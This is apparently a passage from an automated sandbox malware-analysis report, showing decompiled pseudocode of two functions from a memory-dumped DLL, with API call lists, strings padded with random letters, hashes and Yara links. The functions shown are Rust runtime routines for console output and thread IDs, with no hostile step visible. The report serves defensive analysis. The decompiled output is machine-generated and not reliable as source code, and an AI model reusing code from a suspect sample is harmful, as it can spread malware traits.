                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Value
                          • String ID:
                          • API String ID: 3702945584-0
                          • Opcode ID: 95572e1bf1c9febfe903a0c6cb7f6a44bb7ef9c96e08f2b5a764f9a7a7ec703b
                          • Instruction ID: c5f6765deb863d9ebbd237920208401f088f0f5741aed84826d83ee5d60653ab
                          • Opcode Fuzzy Hash: 95572e1bf1c9febfe903a0c6cb7f6a44bb7ef9c96e08f2b5a764f9a7a7ec703b
                          • Instruction Fuzzy Hash: B741B172544259EFDB80BFF9AC14F9A3764AFA2661F045022FF144F204E7A1DA21E791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4B1DA0, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 212fileCOMMON
                          Download Yara Rule
                          C-Code - Quality: 55%
                          			E6E4B1DA0(void* __ebx, struct _OVERLAPPED** __ecx, void* __edx, void* __edi, void* __ebp, signed char _a4, signed char* _a8) {
				char _v20;
				void* _v24;
				char _v44;
				long _v48;
				void* _v52;
				signed int _v56;
				char _v60;
				void* __esi;
				long _t57;
				void* _t58;
				long _t60;
				signed int _t61;
				long _t81;
				signed int _t86;
				signed int _t87;
				signed int _t88;
				signed int _t91;
				char _t93;
				void* _t96;
				void* _t97;
				signed int _t100;
				signed int _t101;
				struct _OVERLAPPED* _t102;
				signed int _t105;
				signed int* _t106;
				signed int _t110;
				signed char _t112;
				void* _t114;
				long _t118;
				void** _t119;
				void* _t120;
				long _t122;
				void* _t125;
				void* _t133;
				struct _OVERLAPPED** _t135;
				void* _t144;
				long _t152;
				signed char* _t155;
				DWORD* _t156;
				void* _t157;
				void** _t158;
				void** _t160;

				_push(__ebp);
				_push(__ebx);
				_push(__edi);
				_t158 = _t157 - 0x30;
				_t152 = _a4;
				_t135 = __ecx;
				if(_t152 == 0) {
					 *(__ecx + 4) = 0;
					goto L5;
				} else {
					_t96 = __edx;
					_t58 = GetStdHandle(0xfffffff4);
					if(_t58 == 0) {
						_t57 = 6;
						goto L7;
					} else {
						_t133 = _t58;
						if(_t58 != 0xffffffff) {
							_v48 = 0;
							_t60 = GetConsoleMode(_t133,  &_v48);
							__eflags = _t60;
							if(_t60 == 0) {
								__eflags = _t133;
								if(__eflags == 0) {
									goto L42;
								} else {
									_v48 = 0;
									_t81 = WriteFile(_t133, _t96, _t152,  &_v48, 0);
									__eflags = _t81;
									if(_t81 == 0) {
										_t57 = GetLastError();
										_t102 = 0;
										__eflags = 0;
										_t122 = 1;
									} else {
										_t102 = _v48;
										_t57 = 0;
										_t122 = 0;
									}
									 *_t135 = _t122;
									_t135[1] = _t102;
									_t135[2] = _t57;
									goto L9;
								}
							} else {
								_t57 = _a8[4] & 0x000000ff;
								__eflags = _t57;
								if(_t57 == 0) {
									__eflags = _t152 - 0x1000;
									_t84 =  <  ? _t152 : 0x1000;
									_push( <  ? _t152 : 0x1000);
									E6E4A3820( &_v60, _t96);
									_t158 =  &(_t158[1]);
									__eflags = _v60 - 1;
									if(_v60 != 1) {
										_t86 = _v56;
										_t97 = _v52;
										goto L28;
									} else {
										__eflags = _v56;
										if(_v56 == 0) {
											_t87 =  *_t96 & 0x000000ff;
											_t38 = _t87 + 0x6e4ecd60; // 0x1010101
											_t105 =  *_t38 & 0x000000ff;
											__eflags = _t105 - 2;
											if(_t105 < 2) {
												L39:
												_t135[2] = 0x6e4ee0bc;
												_t135[1] = 0x1502;
												goto L40;
											} else {
												__eflags = _t105 - _t152;
												if(_t105 <= _t152) {
													goto L39;
												} else {
													_t106 = _a8;
													 *_t106 = _t87;
													_t106[1] = 1;
													goto L38;
												}
											}
											goto L9;
										} else {
											_t88 = _v56;
											__eflags = _t88 - _t152;
											if(__eflags > 0) {
												_t100 = _t88;
												_t118 = _t152;
												_push(0x6e4ee0f4);
												goto L45;
											} else {
												_t125 = _t96;
												_push(_t88);
												E6E4A3820( &_v48, _t125);
												_t158 =  &(_t158[1]);
												_t86 = E6E4B28E0(_t96,  &_v48, _t133, _t135);
												_t97 = _t125;
												L28:
												_push(_t97);
												_push(_t86);
												_t57 = E6E4B2620(_t97, _t135, _t133, _t133, _t135);
												_t158 =  &(_t158[2]);
												goto L9;
											}
										}
									}
								} else {
									__eflags = _t57 - 4;
									if(_t57 >= 4) {
										E6E4C72E0("Unexpected number of bytes for incomplete UTF-8 codepoint.C:eodllautblkklahmhgnetilzvvcslfjwakfzrpeciobxpylgwrokyyfkblnopnjvhlcoxjbvrndpaoezowltgjwguuqlcjtinialvpbtfcixalgwrcjcrthjdwukfjvq", 0x3a, 0x6e4ee05c);
										_t158 =  &(_t158[1]);
										asm("ud2");
										L42:
										_t61 = E6E4C6E20(_t96,  &M6E4ED3AA, 0x23, _t133, _t135, __eflags, 0x6e4ed454);
										_t158 =  &(_t158[1]);
										asm("ud2");
										goto L43;
									} else {
										_t110 =  *_t96;
										_t155 = _a8;
										__eflags = (_t110 & 0x000000c0) - 0x80;
										if((_t110 & 0x000000c0) != 0x80) {
											_a4 = 0;
											goto L24;
										} else {
											_t155[_t57] = _t110;
											_t112 = _a4 + 1;
											_a4 = _t112;
											_t57 =  *_t155 & 0x000000ff;
											_t96 =  *(_t57 + 0x6e4ecd60) & 0x000000ff;
											__eflags = _t96 - _t112;
											_v24 = _t96;
											if(_t96 <= _t112) {
												_t61 = _t112 & 0x000000ff;
												__eflags = _t112 - 5;
												if(__eflags >= 0) {
													L43:
													_t100 = _t61;
													_t118 = 4;
													_push(0x6e4ee0c4);
													L45:
													E6E4C6DB0(_t96, _t100, _t118, _t133, _t135, __eflags);
													_t160 =  &(_t158[1]);
													asm("ud2");
													goto L46;
												} else {
													_push(_t61);
													_t57 = E6E4A3820( &_v60, _t155);
													_t158 =  &(_t158[1]);
													__eflags = _v60 - 1;
													_a4 = 0;
													if(_v60 == 1) {
														L24:
														_t135[2] = 0x6e4ee0bc;
														_t135[1] = 0x1502;
														goto L8;
													} else {
														_t114 = _v52;
														_t91 = _v56;
														__eflags = _t114 - _t96;
														 *_t158 = _t114;
														if(_t114 != _t96) {
															L46:
															_t101 =  &_v24;
															_t119 = _t160;
															_v48 = 0;
															_push(0x6e4ee0d4);
															_push( &_v48);
															goto L48;
														} else {
															_t156 =  &_v48;
															_push(_t96);
															_push(_t91);
															E6E4B2620(_t96, _t156, _t133, _t133, _t135);
															_t160 =  &(_t158[2]);
															__eflags = _v48 - 1;
															if(_v48 != 1) {
																_t93 = _v44;
																 *_t160 = _t96;
																__eflags = _t93 - _t96;
																_v20 = _t93;
																if(_t93 != _t96) {
																	_t101 =  &_v20;
																	_t119 = _t160;
																	_v48 = 0;
																	_push(0x6e4ee0e4);
																	_push(_t156);
																	L48:
																	E6E4C73F0(_t96, _t101, _t119, _t133);
																	asm("ud2");
																	L50();
																	_t120 = _t135;
																	__eflags = _t101 - 0x46a;
																	if(_t101 > 0x46a) {
																		__eflags = _t101 - 0x271c;
																		if(_t101 <= 0x271c) {
																			__eflags = _t101 - 0x1715;
																			if(_t101 > 0x1715) {
																				__eflags = _t101 - 0x1f4d;
																				if(_t101 > 0x1f4d) {
																					__eflags = _t101 - 0x1f4e;
																					if(_t101 == 0x1f4e) {
																						goto L93;
																					} else {
																						__eflags = _t101 - 0x2022;
																						if(_t101 == 0x2022) {
																							goto L93;
																						} else {
																							__eflags = _t101 - 0x25e9;
																							if(_t101 != 0x25e9) {
																								goto L106;
																							} else {
																								goto L93;
																							}
																						}
																					}
																				} else {
																					__eflags = _t101 - 0x1716;
																					if(_t101 == 0x1716) {
																						goto L93;
																					} else {
																						__eflags = _t101 - 0x1b64;
																						if(_t101 == 0x1b64) {
																							goto L93;
																						} else {
																							__eflags = _t101 - 0x1b80;
																							if(_t101 == 0x1b80) {
																								goto L93;
																							} else {
																								goto L106;
																							}
																						}
																					}
																				}
																			} else {
																				__eflags = _t101 - 0x4cf;
																				if(_t101 > 0x4cf) {
																					__eflags = _t101 - 0x4d0;
																					if(_t101 == 0x4d0) {
																						return 4;
																					} else {
																						__eflags = _t101 - 0x50f;
																						if(_t101 == 0x50f) {
																							return 0x1a;
																						} else {
																							__eflags = _t101 - 0x5b4;
																							if(_t101 == 0x5b4) {
																								goto L93;
																							} else {
																								goto L106;
																							}
																						}
																					}
																				} else {
																					__eflags = _t101 - 0x46b;
																					if(_t101 == 0x46b) {
																						return 0x1e;
																					} else {
																						__eflags = _t101 - 0x476;
																						if(_t101 == 0x476) {
																							return 0x20;
																						} else {
																							__eflags = _t101 - 0x4cf;
																							if(_t101 != 0x4cf) {
																								goto L106;
																							} else {
																								return 5;
																							}
																						}
																					}
																				}
																			}
																		} else {
																			_t144 = _t101 - 0x271d;
																			__eflags = _t144 - 0x34;
																			if(_t144 <= 0x34) {
																				goto __edx;
																			}
																			__eflags = _t101 - 0x3c2a - 2;
																			if(_t101 - 0x3c2a < 2) {
																				goto L93;
																			} else {
																				__eflags = _t101 - 0x35ed;
																				if(_t101 == 0x35ed) {
																					goto L93;
																				} else {
																					goto L106;
																				}
																			}
																		}
																	} else {
																		__eflags = _t101 - 0xb6;
																		if(_t101 > 0xb6) {
																			__eflags = _t101 - 0x10a;
																			if(_t101 <= 0x10a) {
																				__eflags = _t101 - 0xde;
																				if(_t101 <= 0xde) {
																					__eflags = _t101 - 0xb7;
																					if(_t101 == 0xb7) {
																						return 0xc;
																					} else {
																						__eflags = _t101 - 0xce;
																						if(_t101 != 0xce) {
																							goto L106;
																						} else {
																							return 0x21;
																						}
																					}
																				} else {
																					__eflags = _t101 - 0xdf;
																					if(_t101 == 0xdf) {
																						return 0x1b;
																					} else {
																						__eflags = _t101 - 0xe8;
																						if(_t101 == 0xe8) {
																							return 0xb;
																						} else {
																							__eflags = _t101 - 0x102;
																							if(_t101 == 0x102) {
																								goto L93;
																							} else {
																								goto L106;
																							}
																						}
																					}
																				}
																			} else {
																				__eflags = _t101 - 0x3e2;
																				if(_t101 > 0x3e2) {
																					__eflags = _t101 - 0x3e3;
																					if(_t101 == 0x3e3) {
																						goto L93;
																					} else {
																						__eflags = _t101 - 0x41d;
																						if(_t101 == 0x41d) {
																							goto L93;
																						} else {
																							__eflags = _t101 - 0x461;
																							if(_t101 == 0x461) {
																								goto L93;
																							} else {
																								goto L106;
																							}
																						}
																					}
																				} else {
																					__eflags = _t101 - 0x10b;
																					if(_t101 == 0x10b) {
																						return 0xe;
																					} else {
																						__eflags = _t101 - 0x150;
																						if(_t101 == 0x150) {
																							return 0xf;
																						} else {
																							__eflags = _t101 - 0x252;
																							if(_t101 == 0x252) {
																								L93:
																								return 0x16;
																							} else {
																								goto L106;
																							}
																						}
																					}
																				}
																			}
																		} else {
																			_t101 = _t101 + 0xfffffffe;
																			__eflags = _t101 - 0xa8;
																			if(_t101 <= 0xa8) {
																				_t120 = _t120 +  *((intOrPtr*)(0x6e4b22a8 + _t101 * 4));
																				goto __edx;
																			}
																			L106:
																			return 0x28;
																		}
																	}
																} else {
																	L38:
																	_t57 = 0;
																	_t135[1] = 1;
																	 *_t135 = 0;
																	goto L9;
																}
															} else {
																asm("movsd xmm0, [esp+0x14]");
																asm("movsd [esi+0x4], xmm0");
																L40:
																_t57 = 1;
																 *_t135 = 1;
																goto L9;
															}
														}
													}
												}
											} else {
												_t135[1] = 1;
												L5:
												 *_t135 = 0;
												goto L9;
											}
										}
									}
								}
							}
						} else {
							_t57 = GetLastError();
							L7:
							_t135[1] = 0;
							_t135[2] = _t57;
							L8:
							 *_t135 = 1;
							L9:
							return _t57;
						}
					}
				}
			}













































                          0x6e4b1da0
                          0x6e4b1da1
                          0x6e4b1da2
                          0x6e4b1da4
                          0x6e4b1da7
                          0x6e4b1dab
                          0x6e4b1daf
                          0x6e4b1dce
                          0x00000000
                          0x6e4b1db1
                          0x6e4b1db1
                          0x6e4b1db5
                          0x6e4b1dbd
                          0x6e4b1ddd
                          0x00000000
                          0x6e4b1dbf
                          0x6e4b1dbf
                          0x6e4b1dc4
                          0x6e4b1dfe
                          0x6e4b1e08
                          0x6e4b1e0e
                          0x6e4b1e10
                          0x6e4b1e69
                          0x6e4b1e6b
                          0x00000000
                          0x6e4b1e71
                          0x6e4b1e71
                          0x6e4b1e83
                          0x6e4b1e89
                          0x6e4b1e8b
                          0x6e4b1f05
                          0x6e4b1f0b
                          0x6e4b1f0b
                          0x6e4b1f0d
                          0x6e4b1e8d
                          0x6e4b1e8d
                          0x6e4b1e91
                          0x6e4b1e93
                          0x6e4b1e93
                          0x6e4b1f12
                          0x6e4b1f14
                          0x6e4b1f17
                          0x00000000
                          0x6e4b1f17
                          0x6e4b1e12
                          0x6e4b1e16
                          0x6e4b1e1a
                          0x6e4b1e1c
                          0x6e4b1e97
                          0x6e4b1ea8
                          0x6e4b1eab
                          0x6e4b1eac
                          0x6e4b1eb1
                          0x6e4b1eb4
                          0x6e4b1eb9
                          0x6e4b1f1f
                          0x6e4b1f23
                          0x00000000
                          0x6e4b1ebb
                          0x6e4b1ebb
                          0x6e4b1ec0
                          0x6e4b1f99
                          0x6e4b1f9c
                          0x6e4b1f9c
                          0x6e4b1fa3
                          0x6e4b1fa6
                          0x6e4b1fdb
                          0x6e4b1fdb
                          0x6e4b1fe2
                          0x00000000
                          0x6e4b1fa8
                          0x6e4b1fa8
                          0x6e4b1faa
                          0x00000000
                          0x6e4b1fac
                          0x6e4b1fac
                          0x6e4b1fb0
                          0x6e4b1fb2
                          0x00000000
                          0x6e4b1fb2
                          0x6e4b1faa
                          0x00000000
                          0x6e4b1ec6
                          0x6e4b1ec6
                          0x6e4b1eca
                          0x6e4b1ecc
                          0x6e4b2035
                          0x6e4b2037
                          0x6e4b2039
                          0x00000000
                          0x6e4b1ed2
                          0x6e4b1ed6
                          0x6e4b1eda
                          0x6e4b1edb
                          0x6e4b1ee0
                          0x6e4b1ee5
                          0x6e4b1eea
                          0x6e4b1f27
                          0x6e4b1f2b
                          0x6e4b1f2c
                          0x6e4b1f2d
                          0x6e4b1f32
                          0x00000000
                          0x6e4b1f32
                          0x6e4b1ecc
                          0x6e4b1ec0
                          0x6e4b1e1e
                          0x6e4b1e1e
                          0x6e4b1e20
                          0x6e4b2004
                          0x6e4b2009
                          0x6e4b200c
                          0x6e4b200e
                          0x6e4b201d
                          0x6e4b2022
                          0x6e4b2025
                          0x00000000
                          0x6e4b1e26
                          0x6e4b1e26
                          0x6e4b1e28
                          0x6e4b1e31
                          0x6e4b1e34
                          0x6e4b1eee
                          0x00000000
                          0x6e4b1e3a
                          0x6e4b1e3a
                          0x6e4b1e41
                          0x6e4b1e43
                          0x6e4b1e46
                          0x6e4b1e4a
                          0x6e4b1e51
                          0x6e4b1e53
                          0x6e4b1e57
                          0x6e4b1f3a
                          0x6e4b1f3d
                          0x6e4b1f40
                          0x6e4b2027
                          0x6e4b2027
                          0x6e4b2029
                          0x6e4b202e
                          0x6e4b203e
                          0x6e4b203e
                          0x6e4b2043
                          0x6e4b2046
                          0x00000000
                          0x6e4b1f46
                          0x6e4b1f4c
                          0x6e4b1f4d
                          0x6e4b1f52
                          0x6e4b1f55
                          0x6e4b1f5a
                          0x6e4b1f5e
                          0x6e4b1ef2
                          0x6e4b1ef2
                          0x6e4b1ef9
                          0x00000000
                          0x6e4b1f60
                          0x6e4b1f60
                          0x6e4b1f64
                          0x6e4b1f68
                          0x6e4b1f6a
                          0x6e4b1f6d
                          0x6e4b2048
                          0x6e4b2048
                          0x6e4b204c
                          0x6e4b204e
                          0x6e4b2056
                          0x6e4b205f
                          0x00000000
                          0x6e4b1f73
                          0x6e4b1f73
                          0x6e4b1f7b
                          0x6e4b1f7c
                          0x6e4b1f7d
                          0x6e4b1f82
                          0x6e4b1f85
                          0x6e4b1f8a
                          0x6e4b1fb8
                          0x6e4b1fbc
                          0x6e4b1fbf
                          0x6e4b1fc1
                          0x6e4b1fc5
                          0x6e4b2062
                          0x6e4b2066
                          0x6e4b2068
                          0x6e4b2070
                          0x6e4b2075
                          0x6e4b2076
                          0x6e4b2076
                          0x6e4b207e
                          0x6e4b2081
                          0x6e4b2086
                          0x6e4b2089
                          0x6e4b208f
                          0x6e4b20b5
                          0x6e4b20bb
                          0x6e4b20d9
                          0x6e4b20df
                          0x6e4b2152
                          0x6e4b2158
                          0x6e4b220e
                          0x6e4b2214
                          0x00000000
                          0x6e4b2216
                          0x6e4b2216
                          0x6e4b221c
                          0x00000000
                          0x6e4b221e
                          0x6e4b221e
                          0x6e4b2224
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4b2224
                          0x6e4b221c
                          0x6e4b215e
                          0x6e4b215e
                          0x6e4b2164
                          0x00000000
                          0x6e4b216a
                          0x6e4b216a
                          0x6e4b2170
                          0x00000000
                          0x6e4b2176
                          0x6e4b2176
                          0x6e4b217c
                          0x00000000
                          0x6e4b2182
                          0x00000000
                          0x6e4b2182
                          0x6e4b217c
                          0x6e4b2170
                          0x6e4b2164
                          0x6e4b20e1
                          0x6e4b20e1
                          0x6e4b20e7
                          0x6e4b21d0
                          0x6e4b21d6
                          0x6e4b2251
                          0x6e4b21d8
                          0x6e4b21d8
                          0x6e4b21de
                          0x6e4b22a1
                          0x6e4b21e4
                          0x6e4b21e4
                          0x6e4b21ea
                          0x00000000
                          0x6e4b21ec
                          0x00000000
                          0x6e4b21ec
                          0x6e4b21ea
                          0x6e4b21de
                          0x6e4b20ed
                          0x6e4b20ed
                          0x6e4b20f3
                          0x6e4b228d
                          0x6e4b20f9
                          0x6e4b20f9
                          0x6e4b20ff
                          0x6e4b2291
                          0x6e4b2105
                          0x6e4b2105
                          0x6e4b210b
                          0x00000000
                          0x6e4b2111
                          0x6e4b2114
                          0x6e4b2114
                          0x6e4b210b
                          0x6e4b20ff
                          0x6e4b20f3
                          0x6e4b20e7
                          0x6e4b20bd
                          0x6e4b20bd
                          0x6e4b20c3
                          0x6e4b20c6
                          0x6e4b20d3
                          0x6e4b20d3
                          0x6e4b21be
                          0x6e4b21c1
                          0x00000000
                          0x6e4b21c3
                          0x6e4b21c3
                          0x6e4b21c9
                          0x00000000
                          0x6e4b21cb
                          0x00000000
                          0x6e4b21cb
                          0x6e4b21c9
                          0x6e4b21c1
                          0x6e4b2091
                          0x6e4b2091
                          0x6e4b2097
                          0x6e4b2115
                          0x6e4b211b
                          0x6e4b2187
                          0x6e4b218d
                          0x6e4b2232
                          0x6e4b2238
                          0x6e4b2249
                          0x6e4b223a
                          0x6e4b223a
                          0x6e4b2240
                          0x00000000
                          0x6e4b2242
                          0x6e4b2245
                          0x6e4b2245
                          0x6e4b2240
                          0x6e4b2193
                          0x6e4b2193
                          0x6e4b2199
                          0x6e4b229d
                          0x6e4b219f
                          0x6e4b219f
                          0x6e4b21a5
                          0x6e4b224d
                          0x6e4b21ab
                          0x6e4b21ab
                          0x6e4b21b1
                          0x00000000
                          0x6e4b21b3
                          0x00000000
                          0x6e4b21b3
                          0x6e4b21b1
                          0x6e4b21a5
                          0x6e4b2199
                          0x6e4b211d
                          0x6e4b211d
                          0x6e4b2123
                          0x6e4b21f1
                          0x6e4b21f7
                          0x00000000
                          0x6e4b21f9
                          0x6e4b21f9
                          0x6e4b21ff
                          0x00000000
                          0x6e4b2201
                          0x6e4b2201
                          0x6e4b2207
                          0x00000000
                          0x6e4b2209
                          0x00000000
                          0x6e4b2209
                          0x6e4b2207
                          0x6e4b21ff
                          0x6e4b2129
                          0x6e4b2129
                          0x6e4b212f
                          0x6e4b2295
                          0x6e4b2135
                          0x6e4b2135
                          0x6e4b213b
                          0x6e4b2299
                          0x6e4b2141
                          0x6e4b2141
                          0x6e4b2147
                          0x6e4b2226
                          0x6e4b2229
                          0x6e4b214d
                          0x00000000
                          0x6e4b214d
                          0x6e4b2147
                          0x6e4b213b
                          0x6e4b212f
                          0x6e4b2123
                          0x6e4b2099
                          0x6e4b2099
                          0x6e4b209c
                          0x6e4b20a2
                          0x6e4b20a8
                          0x6e4b20af
                          0x6e4b20af
                          0x6e4b22a2
                          0x6e4b22a5
                          0x6e4b22a5
                          0x6e4b2097
                          0x6e4b1fcb
                          0x6e4b1fcb
                          0x6e4b1fcb
                          0x6e4b1fcd
                          0x6e4b1fd4
                          0x00000000
                          0x6e4b1fd4
                          0x6e4b1f8c
                          0x6e4b1f8c
                          0x6e4b1f92
                          0x6e4b1fe9
                          0x6e4b1fe9
                          0x6e4b1fee
                          0x00000000
                          0x6e4b1fee
                          0x6e4b1f8a
                          0x6e4b1f6d
                          0x6e4b1f5e
                          0x6e4b1e5d
                          0x6e4b1e5d
                          0x6e4b1dd5
                          0x6e4b1dd5
                          0x00000000
                          0x6e4b1dd5
                          0x6e4b1e57
                          0x6e4b1e34
                          0x6e4b1e20
                          0x6e4b1e1c
                          0x6e4b1dc6
                          0x6e4b1dc6
                          0x6e4b1de2
                          0x6e4b1de2
                          0x6e4b1de9
                          0x6e4b1dec
                          0x6e4b1dec
                          0x6e4b1df2
                          0x6e4b1df9
                          0x6e4b1df9
                          0x6e4b1dc4
                          0x6e4b1dbd

                          APIs
                          • GetStdHandle.KERNEL32(000000F4,?,?,?,?,?,?,?,?,?,6E4B1C2E,?), ref: 6E4B1DB5
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,6E4B1C2E,?), ref: 6E4B1DC6
                          • GetConsoleMode.KERNEL32(00000000,?), ref: 6E4B1E08
                          • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 6E4B1E83
                          • GetLastError.KERNEL32(?,?,?,00000000), ref: 6E4B1F05
                          Strings
                          • assertion failed: !handle.is_null()C:wzsrrzyhpokwddixmxfulwzhcndebeithwkkhwbuyssisqxbeobnryngrerqutlqsjvizxvibhexzqwhpywnaymoprangqwwlydycgacflwbjqxhaclrecozjqfmkoreeed, xrefs: 6E4B200E
                          • Unexpected number of bytes for incomplete UTF-8 codepoint.C:eodllautblkklahmhgnetilzvvcslfjwakfzrpeciobxpylgwrokyyfkblnopnjvhlcoxjbvrndpaoezowltgjwguuqlcjtinialvpbtfcixalgwrcjcrthjdwukfjvq, xrefs: 6E4B1FF5
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ErrorLast$ConsoleFileHandleModeWrite
                          • String ID: Unexpected number of bytes for incomplete UTF-8 codepoint.C:eodllautblkklahmhgnetilzvvcslfjwakfzrpeciobxpylgwrokyyfkblnopnjvhlcoxjbvrndpaoezowltgjwguuqlcjtinialvpbtfcixalgwrcjcrthjdwukfjvq$assertion failed: !handle.is_null()C:wzsrrzyhpokwddixmxfulwzhcndebeithwkkhwbuyssisqxbeobnryngrerqutlqsjvizxvibhexzqwhpywnaymoprangqwwlydycgacflwbjqxhaclrecozjqfmkoreeed
                          • API String ID: 4172320683-607870617
                          • Opcode ID: 00060d47c4168ebe440fddd47cd6ae22d89b537d6eccc557ac989d4debe8ba18
                          • Instruction ID: 51eacc7cd2949db9ebc35b4a1696d01eacb128658c21544cd20338a0c89b0cdb
                          • Opcode Fuzzy Hash: 00060d47c4168ebe440fddd47cd6ae22d89b537d6eccc557ac989d4debe8ba18
                          • Instruction Fuzzy Hash: B371C0706083459FD7108FB9C494B6B7BE9AB86349F10882EE4D68B380D771E94DCB63
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4AC690, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 95memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 45%
                          			E6E4AC690(void* __ebx, void* __edi, void* __esi, void* _a8) {
				long _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				signed int _v36;
				char _v40;
				long _v48;
				void* __ebp;
				void* _t22;
				void* _t29;
				void* _t30;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				void* _t54;

				_t32 = __ebx;
				_v32 = _t54 - 0x20;
				_v20 = 0xffffffff;
				_v24 = E6E4B3B40;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				_v48 = 0;
				__imp__AcquireSRWLockExclusive(0x6e4fada8, __esi, __edi, __ebx);
				_t47 =  *0x6e4fa038; // 0x1
				_t50 =  *0x6e4fa03c; // 0x0
				_v40 = 0x6e4fada8;
				_t43 = _t47 & _t50;
				if(_t43 == 0xffffffff) {
					L8:
					_v36 = _t43;
					__imp__ReleaseSRWLockExclusive(0x6e4fada8);
					_v20 = 0;
					_t22 = E6E4C72E0("failed to generate unique thread ID: bitspace exhausted", 0x37, 0x6e4ed270);
					goto L10;
				} else {
					 *0x6e4fa038 = _t47 + 1;
					asm("adc ecx, 0x0");
					 *0x6e4fa03c = _t50;
					if((_t47 | _t50) == 0) {
						_v36 = _t43;
						_v20 = 0;
						_t22 = E6E4C6E20(__ebx, "called `Option::unwrap()` on a `None` value", 0x2b, _t47, _t50, __eflags, 0x6e4ed280);
						L10:
						asm("ud2");
						__eflags = _v36 - 0xffffffff;
						if(_v36 != 0xffffffff) {
							E6E4AC870(_t22,  &_v40);
						}
						return E6E4AC850( &_v48);
					} else {
						__imp__ReleaseSRWLockExclusive(0x6e4fada8);
						_t29 =  *0x6e4fadc8; // 0xb00000
						if(_t29 != 0) {
							L5:
							_t30 = HeapAlloc(_t29, 0, 0x20);
							if(_t30 == 0) {
								goto L7;
							} else {
								 *(_t30 + 8) = _t47;
								 *(_t30 + 0xc) = _t50;
								 *(_t30 + 0x10) = 0;
								 *((char*)(_t30 + 0x18)) = 0;
								 *_t30 = 1;
								 *(_t30 + 4) = 1;
								 *[fs:0x0] = _v28;
								return _t30;
							}
						} else {
							_t29 = GetProcessHeap();
							if(_t29 == 0) {
								L7:
								_t43 = 8;
								E6E4C6C30(_t32, 0x20, 8, _t47, _t50, __eflags);
								asm("ud2");
								goto L8;
							} else {
								 *0x6e4fadc8 = _t29;
								goto L5;
							}
						}
					}
				}
			}


















                          0x6e4ac690
                          0x6e4ac699
                          0x6e4ac69c
                          0x6e4ac6a3
                          0x6e4ac6b4
                          0x6e4ac6b7
                          0x6e4ac6bd
                          0x6e4ac6c9
                          0x6e4ac6cf
                          0x6e4ac6d5
                          0x6e4ac6db
                          0x6e4ac6e4
                          0x6e4ac6e9
                          0x6e4ac77f
                          0x6e4ac77f
                          0x6e4ac787
                          0x6e4ac78d
                          0x6e4ac7a3
                          0x00000000
                          0x6e4ac6ef
                          0x6e4ac6f6
                          0x6e4ac6fd
                          0x6e4ac702
                          0x6e4ac708
                          0x6e4ac7ad
                          0x6e4ac7b0
                          0x6e4ac7c6
                          0x6e4ac7ce
                          0x6e4ac7ce
                          0x6e4ac7d7
                          0x6e4ac7db
                          0x6e4ac7e0
                          0x6e4ac7e0
                          0x6e4ac7f1
                          0x6e4ac70e
                          0x6e4ac713
                          0x6e4ac719
                          0x6e4ac720
                          0x6e4ac730
                          0x6e4ac735
                          0x6e4ac73c
                          0x00000000
                          0x6e4ac73e
                          0x6e4ac73e
                          0x6e4ac741
                          0x6e4ac744
                          0x6e4ac74b
                          0x6e4ac74f
                          0x6e4ac755
                          0x6e4ac75f
                          0x6e4ac76d
                          0x6e4ac76d
                          0x6e4ac722
                          0x6e4ac722
                          0x6e4ac729
                          0x6e4ac76e
                          0x6e4ac773
                          0x6e4ac778
                          0x6e4ac77d
                          0x00000000
                          0x6e4ac72b
                          0x6e4ac72b
                          0x00000000
                          0x6e4ac72b
                          0x6e4ac729
                          0x6e4ac720
                          0x6e4ac708

                          APIs
                          • AcquireSRWLockExclusive.KERNEL32(6E4FADA8), ref: 6E4AC6C9
                          • ReleaseSRWLockExclusive.KERNEL32(6E4FADA8), ref: 6E4AC713
                          • GetProcessHeap.KERNEL32 ref: 6E4AC722
                          • HeapAlloc.KERNEL32(00B00000,00000000,00000020), ref: 6E4AC735
                          • ReleaseSRWLockExclusive.KERNEL32(6E4FADA8), ref: 6E4AC787
                          Strings
                          • failed to generate unique thread ID: bitspace exhausted, xrefs: 6E4AC794
                          • called `Option::unwrap()` on a `None` value, xrefs: 6E4AC7B7
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ExclusiveLock$HeapRelease$AcquireAllocProcess
                          • String ID: called `Option::unwrap()` on a `None` value$failed to generate unique thread ID: bitspace exhausted
                          • API String ID: 1780889587-1657987152
                          • Opcode ID: cdbca23a8194403761f5ab5f9484a72302f8e76e15f22c2bca05474f59dd7df7
                          • Instruction ID: f3cb1d12278117d4aeeb3c2fdbd406c15bbcd56eb1f4348570389ac269d4da80
